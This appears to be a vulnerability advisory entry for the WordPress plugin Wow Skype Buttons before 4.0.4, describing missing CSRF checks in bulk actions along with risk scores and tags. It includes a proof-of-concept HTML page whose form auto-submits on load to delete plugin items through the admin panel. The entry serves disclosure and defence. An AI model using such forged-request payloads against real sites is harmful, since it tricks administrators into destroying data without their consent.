Lucene search

K
wpexploitBob MatyasWPEX-ID:E5C3E145-6738-4D85-8507-43CA1B1D5877
HistoryApr 11, 2024 - 12:00 a.m.

Wow Skype Buttons < 4.0.4 - Button Deletion via CSRF

2024-04-1100:00:00
Bob Matyas
17
skype
buttons
csrf
exploit
update

6.8 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks

As an admin open HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=mwp-skype" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

6.8 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Related for WPEX-ID:E5C3E145-6738-4D85-8507-43CA1B1D5877